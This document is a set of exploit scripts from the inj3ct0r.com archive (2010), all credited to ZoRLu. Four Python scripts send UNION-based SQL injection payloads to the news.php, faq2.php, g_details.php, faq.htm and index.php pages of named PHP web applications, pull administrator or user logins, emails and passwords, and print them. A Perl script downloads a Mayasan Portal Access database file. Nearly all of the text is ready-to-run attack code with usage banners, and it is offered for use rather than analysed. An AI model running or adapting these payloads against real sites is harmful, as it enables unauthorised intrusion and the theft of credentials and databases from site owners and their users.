http://inj3ct0r.com/exploits/13552



=============================================================
Eremetia (news.php & faq2.php id) SQL Injection Exploit (.py)
=============================================================


#!/usr/bin/env python
#-*- coding:cp1254 -*-

# Eremetia (news.php & faq2.php id) SQL Injection Exploit (.py)
# Author ZoRLu
# Exploit Coded By ZoRLu / Date: 02/08/2010
# Found The_Exploited / Date: 29/04/2010
# Orijinal Link http://inj3ct0r.com/exploits/12059
# Tested on my vista proof: http://img251.imageshack.us/img251/4673/eremetia.jpg
# Home: z0rlu.blogspot.com
# Home: imhatimi.org
# Thanks: inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends

import sys, urllib2, re, os, time

if len(sys.argv) < 2:
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " Eremetia (id) SQL Inj Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print " Usage: "
print " "
print " python exploit.py http://site.com/path/ "
print " "
print "_______________________________________________________________"
sys.exit(1)

add = "http://"
add2 = "/"

sitemiz = sys.argv[1]
if sitemiz[-1:] != add2:
print "\nwhere is it: " + add2
print "okk I will add"
time.sleep(2)
sitemiz += add2
print "its ok" + " " + sitemiz

if sitemiz[:7] != add:
print "\nwhere is it: " + add
print "okk I will add"
time.sleep(2)
sitemiz = add + sitemiz
print "its ok" + " " + sitemiz

vulnfile = "news.php"
sql = "?id=000000000+union+select+1,2,concat(0x3a3a3a,login,0x3a3a,senha,0x3a3a3a),4,5+from+admin"
url = sitemiz + vulnfile + sql

vulnfile2 = "faq2.php"
sql2 = "?id=000000000+union+select+1,2,concat(0x3a3a3a,login,0x3a3a,senha,0x3a3a3a),4+from+admin"
url2 = sitemiz + vulnfile2 + sql2

print "\nvulnfile:"+vulnfile
print "column_number: 5"
print "sql: "+sql

print "\nExploiting...\n"
print "wait three sec.!\n"
time.sleep(3)

try:
veri = urllib2.urlopen(url).read()
aliver = re.findall(r":::(.*)([0-9a-fA-F])(.*):::", veri)
if len(aliver) > 0:
print "login::password: " + aliver[0][0]+ aliver[0][1]

print "\n" + vulnfile + " ok!"
print "wait for other file"
time.sleep(2)
else:
print "Exploit failed..."


except urllib2.HTTPError:
print "Forbidden Sorry! Server has a Security!"

print "\nvulnfile:"+vulnfile2
print "column_number: 4"
print "sql: "+sql2

print "\nExploiting...\n"
print "wait three sec.!\n"
time.sleep(3)

try:
veri = urllib2.urlopen(url2).read()
aliver = re.findall(r":::(.*)([0-9a-fA-F])(.*):::", veri)
if len(aliver) > 0:
print "login::password: " + aliver[0][0]+ aliver[0][1]

print "\nGood Job Bro!"
print "we searched for " + vulnfile + " and " + vulnfile2
else:
print "Exploit failed..."


except urllib2.HTTPError:
print "Forbidden Sorry! Server has a Security!"


# Inj3ct0r.com [2010-08-02]

eSmart-Vision Trading (g_details.php id) SQL Injection Exploit (.py)

http://inj3ct0r.com/exploits/13549



====================================================================
eSmart-Vision Trading (g_details.php id) SQL Injection Exploit (.py)
====================================================================

#!/usr/bin/env python
#-*- coding:utf-8 -*-

# eSmart-Vision Trading (g_details.php id) SQL Injection Exploit (.py)
# Found & Coded By ZoRLu
# Tested on my vista proof: http://img251.imageshack.us/img251/7747/esmart.jpg
# Date: 01/08/2010
# Home: z0rlu.blogspot.com
# Home: imhatimi.org
# Thanks: inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends

import sys, urllib2, re, os, time

if len(sys.argv) < 2:
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " eSmart-Vision Trading SQL Inj Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print " Usage: "
print " "
print " python exploit.py http://site.com/path/ "
print " "
print "_______________________________________________________________"
sys.exit(1)

add = "http://"
add2 = "/"

sitemiz = sys.argv[1]
if sitemiz[-1:] != add2:
print "\nwhere is it: " + add2
print "okk I will add"
time.sleep(2)
sitemiz += add2
print "its ok" + " " + sitemiz

if sitemiz[:7] != add:
print "\nwhere is it: " + add
print "okk I will add"
time.sleep(2)
sitemiz = add + sitemiz
print "its ok" + " " + sitemiz

vulnfile = "g_details.php"
sql = "?id=0000000+union+select+1,2,3,4,concat(0x3e3e3e,email,0x3a3a,password,0x3e3e3e),6,7+from+userinfo--"
url = sitemiz + vulnfile + sql

print "\nExploiting...\n"
print "wait three sec.!\n"
time.sleep(3)

try:
veri = urllib2.urlopen(url).read()
aliver = re.findall(r">>>(.*)([0-9a-fA-F])(.*)>>>", veri)
if len(aliver) > 0:
print "email::password: " + aliver[0][0]

print "\nGood Job Bro!"
else:
print "Exploit failed..."


except urllib2.HTTPError:
print "Forbidden Sorry! Server has a Security!"



# Inj3ct0r.com [2010-08-02]

Payment Processor Script (faq.htm farea) SQL Injection Exploit (.py)

http://inj3ct0r.com/exploits/13546



====================================================================
Payment Processor Script (faq.htm farea) SQL Injection Exploit (.py)
====================================================================


#!/usr/bin/env python
#-*- coding:utf-8 -*-

# Payment Processor Script (faq.htm farea) SQL Injection Exploit (.py)
# Found & Coded By ZoRLu
# Tested on my vista proof: http://img838.imageshack.us/img838/4229/proces.jpg
# Date: 01/08/2010
# Home: z0rlu.blogspot.com
# Home: imhatimi.org
# Thanks: inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends

import sys, urllib2, re, os, time

if len(sys.argv) < 2:
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " Payment Processor Script SQL Inj Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print " Usage: "
print " "
print " python exploit.py http://site.com/path/ "
print " "
print "_______________________________________________________________"
sys.exit(1)

sitemiz = sys.argv[1]
if sitemiz[-1:] != "/":
sitemiz += "/"

vulnfile = "faq.htm"
sql = "?farea=4+union+select+1,concat(0x3a3a3a,username,0x3a3a3a,password,0x3a3a3a),3+from+dp_members"
login = "members/login.htm"
url = sitemiz + vulnfile + sql
url2 = sitemiz + login

print "\nExploiting...\n"
print "wait three sec.!\n"
time.sleep(3)

try:
veri = urllib2.urlopen(url).read()
aliver = re.findall(r":::(.*)([0-9a-fA-F])(.*):::", veri)
if len(aliver) > 0:
print "username:::password: " + aliver[0][0]

print "\nGood Job Bro!"
print "you will be login"
print "Login: " + url2
else:
print "Exploit failed..."


except urllib2.HTTPError:
print "Forbidden Sorry! Server has a Security!"


# Inj3ct0r.com [2010-08-01]

BosDev BosClassifieds (cat_id) SQL Injection Exploit (.py)

http://inj3ct0r.com/exploits/13531



==========================================================
BosDev BosClassifieds (cat_id) SQL Injection Exploit (.py)
==========================================================


#!/usr/bin/env python
#-*- coding:utf-8 -*-
# BosDev BosClassifieds (cat_id) SQL Injection Exploit (.py)
# Found & Coded By ZoRLu
# Tested on my vista proof: http://img24.imageshack.us/img24/2729/bosdev.jpg
# Date: 31/07/2010
# Home: z0rlu.blogspot.com
# Home: imhatimi.org
# Thanks: Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends

import sys, urllib2, re, os, time

if len(sys.argv) < 2:
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " BosDev BosClassifieds SQL Inj Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print " Usage: "
print " "
print " python exploit.py http://site.com/path/ "
print " "
print "_______________________________________________________________"
sys.exit(1)

sitemiz = sys.argv[1]
if sitemiz[-1:] != "/":
sitemiz += "/"

url = sitemiz + "index.php?cat_id=-9999+union+select+concat(0x3a3a3a,username,password,0x3a3a3a)+from+bosdevUUS--"

print "\nExploiting...\n"
print "wait three sec.!\n"
time.sleep(3)

try:
veri = urllib2.urlopen(url).read()
aliver = re.findall(r":::(.*)([0-9a-fA-F]{32})(.*)", veri)
if len(aliver) > 0:
print "Username: " + aliver[0][0]
print "Password: " + aliver[0][1]
print "\nGood Job Bro!"
else:
print "Exploit failed..."

except urllib2.HTTPError:
print "Forbidden Sorry! Server has a Security!"



# Inj3ct0r.com [2010-08-01]

Mayasan Portal V 1.0 / V 2.0 Database Disclosure Exploit (.pl)

http://inj3ct0r.com/exploits/13524


========================================================
MAYASAN PORTAL V 1.0 / V 2.0 Database Disclosure Exploit
========================================================


#!/usr/bin/perl -w
#
# MAYASAN PORTAL V 1.0 / V 2.0 Database Disclosure Exploit
#
# Found & Coded: ZoRLu
#
# Tested on my vista proof: http://img37.imageshack.us/img37/3531/testcz.jpg
#
# Date: 25/07/2010
#
# Home: z0rlu.blogspot.com
#
# Thanks: Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends
#
# Download : http://mportal.somee.com/indir/v20/v20/v20.zip



use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('title MAYASAN PORTAL V 1.0 / v 2.0 Database Disclosure Exploit');
system('color 4');


if(@ARGV < 2)
{
print "[-]Ornegi inceleyin\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}

print "\n************************************************************************\n";
print "\* MAYASAN PORTAL V 1.0 / v 2.0 Database Disclosure Exploit *\n";
print "\* Exploited By : ZoRLu *\n";
print "\* msn : admin[at]yildirimordulari.com *\n";
print "\* Home : http://z0rlu.blogspot.com *\n";
print "\*********************************************************************\n\n\n";

($TargetIP, $path, $File,) = @ARGV;

$File="db/mayasanportal.mdb";
my $url = "http://" . $TargetIP . $path . $File;
print "\n wait!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "C:/db.mdb");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to C:/db.mdb\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}


# Inj3ct0r.com [2010-07-30]
 
Dizi